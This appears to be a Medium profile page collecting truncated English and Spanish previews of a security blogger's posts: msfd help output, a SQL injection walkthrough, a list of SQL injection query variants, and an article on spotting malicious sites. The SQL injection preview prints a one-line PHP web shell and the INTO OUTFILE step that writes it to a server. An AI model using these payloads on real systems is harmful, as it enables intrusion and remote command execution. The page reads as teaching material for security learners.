msfd — Provides an instance of msfconsole that remote clients can connect to
root@kali:~# msfd -h
Usage: msfd <options>
OPTIONS:
-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSLhttps://tools.kali.org/exploitation-tools/metasploit-framework
Msfd allows us to connect to a metasploit session no matter what machine we are on, just by having the…
Para empezar, primero tenemos que hablar del servicio “Msfd”
msfd — Provides an instance of msfconsole that remote clients can connect to
root@kali:~# msfd -h
Usage: msfd <options>
OPTIONS:
-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSLhttps://tools.kali.org/exploitation-tools/metasploit-framework
Msfd nos permite conectarnos a una sesión de metasploit sin importar…
In this case we are going to take advantage of a sql injection error to be able to “jump” to other vulnerabilities.
For this we have to have write permissions and know the path where the server is mounted, they can do it with an @@datadir, in this case I have the path on the error screen
After having the path, what we are going to do is inject the shell, in this case it is a simple backdoor in php:
‘<? php system ($ _ GET [“cmd”]); ?> ‘
We are going to inject it using:
INTO + OUTFILE…
En este caso vamos a aprovechar un error de sql inyection para poder “saltar” a otras vulnerabilidades.
Después de tener la ruta, lo que vamos a hacer es inyectar la shell, en este caso es una simple backdoor en php:
‘<?php system($_GET[“cmd”]); ?>’
Lo vamos a inyectar usando:
INTO+OUTFILE+’ruta/nombre.php’
Inyectan y se nos cargara el archivo en el server, ahora accedemos.
SELECT RPAD(table_name,50,'.') from information_schema.tables where table_schema sounds like database()
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
Select unhex(hex(reverse(reverse(elt(1, table_Name))))) from information_schema.tables
SELECT CASE WHEN (1=1) THEN table_name ELSE '<a href=https://twitter.com/_Y000_>_Y00!_</a>' END from information_schema.tablesSELECT CASE 4 WHEN 1 THEN database() WHEN 2 THEN @@version WHEN 3 THEN table_name ELSE '_Y000!_' END FROM information_schema.tablesSELECT CASE WHEN 1>0 THEN table_name ELSE '_Y000!_' END FROM information_schema.tables
SELECT IF(STRCMP('1','1'),'_Y000!_',table_name) FROM information_schema.tablesselect IF(MID(@@version,1,1)='5',table_name,'_Y000!_') from information_schema.tables
SELECT IFNULL(1+1/0,table_name) FROM information_schema.tables
SELECT NULLIF(table_name,2) from information_schema.tables
select upper(reverse(right(reverse(table_name),100)))from information_schema.tables where table_schema sounds like database()
…
Nowadays it is crucial to know how to identify a malicious website from an official site, this is increasingly difficult due to the hard work that fraudulent sites have behind.
In this writing we are going to analyze some malicious sites that are dedicated to spreading malware for mobile devices and PCs.
A malicious link is a seemingly reliable ‘link’ that, when clicking on it, redirects to a fake website that imitates being a legitimate official website. …
Hoy en día es crucial el saber identificar un sitio web malicioso de un sitio oficial, esto es cada vez más difícil por el arduo trabajo que tienen los sitios fraudulentos por atrás.
En este escrito vamos a analizar unos sitios maliciosos que se dedican a difundir malware para dispositivos mobiles y PC.
Un enlace malicioso es un ‘link’ aparentemente fiable pero que, al pinchar en él, redirige a una web falsa que imita ser una web oficial legítima. …
Hola, Bienvenido a mi perfil de Medium! Soy Y000! 😊 ¿Quién soy? 🤔 Bueno… soy yo jaja soy solo un apasionado por la seguridad informatica.